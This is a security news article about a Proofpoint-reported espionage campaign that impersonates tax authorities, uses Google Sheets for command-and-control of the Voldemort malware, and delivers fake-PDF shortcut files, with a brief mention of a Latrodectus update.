Cybersecurity researchers have recently uncovered a unique malware campaign that exploits Google Sheets as a command-and-control (C2) server. The activity, which was first detected by Proofpoint on August 5, 2024, impersonates tax authorities from governments across Europe, Asia, and the U.S. The campaign aims to target over 70 organizations worldwide using a bespoke tool named Voldemort, designed to gather information and deliver additional payloads.

The targeted sectors are diverse, including insurance, aerospace, transportation, academia, finance, technology, industrial, healthcare, automotive, hospitality, energy, government, media, manufacturing, telecom, and social benefit organizations. The suspected cyber espionage campaign has not been attributed to a specific named threat actor, but it has sent as many as 20,000 email messages as part of the attacks.

The emails claim to be from tax authorities in the U.S., the U.K., France, Germany, Italy, India, and Japan, alerting recipients about changes to their tax filings and urging them to click on Google AMP Cache URLs that redirect users to an intermediate landing page.

According to Proofpoint researchers Tommy Madjar, Pim Trouerbach, and Selena Larson, the landing page inspects the User-Agent string to determine if the operating system is Windows. If it is, the page leverages the search-ms: URI protocol handler to display a Windows shortcut (LNK) file that uses Adobe Acrobat Reader to masquerade as a PDF file, attempting to trick the victim into launching it.

Proofpoint described the activity as aligned to advanced persistent threats (APT) but carrying "cybercrime vibes" due to the use of techniques popular in the e-crime landscape. The researchers also noted the increasing prevalence of this approach among malware families that act as initial access brokers (IABs), such as Latrodectus, DarkGate, and XWorm.

The campaign has been branded unusual, raising the possibility that the threat actors cast a wide net before zeroing in on a small pool of targets. It's also possible that the attackers, likely with varying levels of technical expertise, planned to infect several organizations.

"While many of the campaign characteristics align with cybercriminal threat activity, we assess this is likely espionage activity conducted to support as yet unknown final objectives," the researchers said. "The Frankensteinian amalgamation of clever and sophisticated capabilities, paired with very basic techniques and functionality, makes it difficult to assess the level of the threat actor's capability and determine with high confidence the ultimate goals of the campaign."

This development comes as Netskope Threat Labs uncovered an updated version of the Latrodectus malware (version 1.4) that comes with a new C2 endpoint and adds two new backdoor commands that allow it to download shellcode from a specified server and retrieve arbitrary files from a remote location.

"Latrodectus has been evolving pretty fast, adding new features to its payload," security researcher Leandro Fróes said. "The understanding of the updates applied to its payload allows defenders to keep automated pipelines properly set as well as use the information for further hunting for new variants."